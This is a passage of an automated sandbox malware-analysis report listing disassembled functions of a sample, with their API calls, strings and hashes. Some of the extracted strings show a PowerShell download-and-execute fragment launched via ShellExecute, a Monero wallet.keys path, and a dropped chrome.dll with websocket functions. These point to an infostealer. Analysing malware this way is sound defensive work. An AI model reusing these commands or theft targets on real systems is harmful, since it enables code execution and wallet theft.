                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 3e7cb191865e90d558998b8b73e91c6abcc892de1bd522570b94b08d46b57cca
                                    • Instruction ID: a8e98424de96ff352b340d09586479730ebc976adb0febff871ca7ee66776fbe
                                    • Opcode Fuzzy Hash: 3e7cb191865e90d558998b8b73e91c6abcc892de1bd522570b94b08d46b57cca
                                    • Instruction Fuzzy Hash: 02410171D106089ADB2AFFA0C861FDDB779AF54300F508459F00A6B191EF782A49CF51
                                    Function 00374300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00F3D458,00000000,00020119,?), ref: 00374344
                                    • RegQueryValueExA.ADVAPI32(?,00F3DD88,00000000,00000000,00000000,000000FF), ref: 00374368
                                    • RegCloseKey.ADVAPI32(?), ref: 00374372
                                    • lstrcat.KERNEL32(?,00000000), ref: 00374397
                                    • lstrcat.KERNEL32(?,00F3DB78), ref: 003743AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: a7034d8ee1faefa49087c1bcc4165330c15ffa25b12449e6b3e2c7fe28025710
                                    • Instruction ID: 0ef756fd4da838f1d5894b08f977f48347875a926703911a5db666602fb5096a
                                    • Opcode Fuzzy Hash: a7034d8ee1faefa49087c1bcc4165330c15ffa25b12449e6b3e2c7fe28025710
                                    • Instruction Fuzzy Hash: B8418FB6900108BBDB25E7A0EC56FEE733DBB48700F04C559B71A5B181EA7557888BD1
                                    Function 003DCBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: 1b6fb0113bb7797c13620b75bec2ccf609f27ebe0a42a07bb6b84582c4245044
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 74218173D3061AABDB239E55EC4196F3A69EB81790F065117FA09AB311D3308D42DBA0
                                    Function 00376BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00376C0C
                                    • sscanf.NTDLL ref: 00376C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00376C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00376C60
                                    • ExitProcess.KERNEL32 ref: 00376C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 63f17657f50f075e0e23f29e3d3f428eb1e1bec260e209b335e60bbc4b2c7b46
                                    • Instruction ID: 9bd37f60752e4b3a39fa83c407c9afc326a58bc194aac017eb5737cf8aa0ae6d
                                    • Opcode Fuzzy Hash: 63f17657f50f075e0e23f29e3d3f428eb1e1bec260e209b335e60bbc4b2c7b46
                                    • Instruction Fuzzy Hash: 9321EDB5D14209ABCF55DFE4E8559EEB7B6BF48300F04852DF40AA3250EB349608CB64
                                    Function 00377F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,00F2B8F8,00000000,00020119,?), ref: 00377FEE
                                    • RegQueryValueExA.ADVAPI32(?,00F3D418,00000000,00000000,000000FF,000000FF), ref: 0037800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00378022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 40ec8f73d1a84bdaf46f47569aecd8a14fd41772e4d5d22da26ebbf0f556713f
                                    • Instruction ID: 71db86d3df2cbc43587d714a31272c6f68a138d10c3f8680df8a2ce4db3c7124
                                    • Opcode Fuzzy Hash: 40ec8f73d1a84bdaf46f47569aecd8a14fd41772e4d5d22da26ebbf0f556713f
                                    • Instruction Fuzzy Hash: C1114FB1A84205BBD724CF94DD49FAFB7BDEB04B10F108119F615A7680D7B95904CBE1
                                    Function 003793F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(00F3DC98,00000000,00000000,?,00369F71,00000000,00F3DC98,00000000), ref: 003793FC
                                    • lstrcpyn.KERNEL32(00637580,00F3DC98,00F3DC98,?,00369F71,00000000,00F3DC98), ref: 00379420
                                    • lstrlen.KERNEL32(00000000,?,00369F71,00000000,00F3DC98), ref: 00379437
                                    • wsprintfA.USER32 ref: 00379457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: c6cc746b0a0361b19e2ac22233d42461e50c4dfe0e3936f90cdefafffaa99caa
                                    • Instruction ID: f0f11fb84da2f5d23d593d8bed1597d923f207a350496fc660e5691279de42ae
                                    • Opcode Fuzzy Hash: c6cc746b0a0361b19e2ac22233d42461e50c4dfe0e3936f90cdefafffaa99caa
                                    • Instruction Fuzzy Hash: B401D2B661420CFFCB14DF98C954EAE7BB9EB44314F148248F90D9B244DB31AA50DBD0
                                    Function 003612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003612B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003612BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003612D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003612F5
                                    • RegCloseKey.ADVAPI32(?), ref: 003612FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 146659e22715eaf87f63a959968e3f426d29414a5a2e2876748a011defb24671
                                    • Instruction ID: 2c7512ed4537fac1f2aa3cfdf76e4b5df82ab60e5e7d820fe8fb76cb903abf2d
                                    • Opcode Fuzzy Hash: 146659e22715eaf87f63a959968e3f426d29414a5a2e2876748a011defb24671
                                    • Instruction Fuzzy Hash: 6501E1B9A44209BFDB14DFD4DC49FAE77B9EB48701F108195FA0597280D770AA00DB90
                                    Function 0037CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 6706b96ef15449a33c9d8bd3e10eb909b422f611ff35504a89f897f69d1805d3
                                    • Instruction ID: c0723d4ce33b9c9d032fa419790cf203e943e3536d563c378be184a6766e29f3
                                    • Opcode Fuzzy Hash: 6706b96ef15449a33c9d8bd3e10eb909b422f611ff35504a89f897f69d1805d3
                                    • Instruction Fuzzy Hash: 0F4105B101079C9EDB338B248C85FFBBBECAB45704F1484ECE98E96142D2359A459F20
                                    Function 003768D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00376903
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 003769C6
                                    • ExitProcess.KERNEL32 ref: 003769F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: fb9e9db7f39746ff0c1ccf44ae71b415642062b1d30d6be059269644c6e28596
                                    • Instruction ID: 8e41ff16aff07083a78aa6494b15b5003b9266a30b4b6b1d52831366d58f0b2e
                                    • Opcode Fuzzy Hash: fb9e9db7f39746ff0c1ccf44ae71b415642062b1d30d6be059269644c6e28596
                                    • Instruction Fuzzy Hash: C03161F1901218ABDB26EB90DC95FDEB779AF44300F409188F2096B191DF746B48CFA9
                                    Function 00378950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380E10,00000000,?), ref: 003789BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003789C6
                                    • wsprintfA.USER32 ref: 003789E0
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 0fac883b8829000d245379df29311f96015ceb7f5d7feff43b19c2b022ba708b
                                    • Instruction ID: ce3aa1d3ec7aaa3d21429ae7e06896a5cd1f193d2f11d7d27e73c56714e14b7b
                                    • Opcode Fuzzy Hash: 0fac883b8829000d245379df29311f96015ceb7f5d7feff43b19c2b022ba708b
                                    • Instruction Fuzzy Hash: A6214FB1A44208EFDB14DFD4DD45FAEBBB9FB48B11F108159FA15A7280C775A900CBA4
                                    Function 0036A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0036A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: ca2a522940a18642c22f5990dbd4dd549658a775c00ec71feb92d16585eee141
                                    • Instruction ID: 74f30c44191c40d7966c1644b08b01b4a8fdf540918dd5aee4e38e736a51f576
                                    • Opcode Fuzzy Hash: ca2a522940a18642c22f5990dbd4dd549658a775c00ec71feb92d16585eee141
                                    • Instruction Fuzzy Hash: 77F0B4F054D304AFD73AAB64EC84B5537AAE305304F102454F005A75A0CBB5A8C5EFE2
                                    Function 00378EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
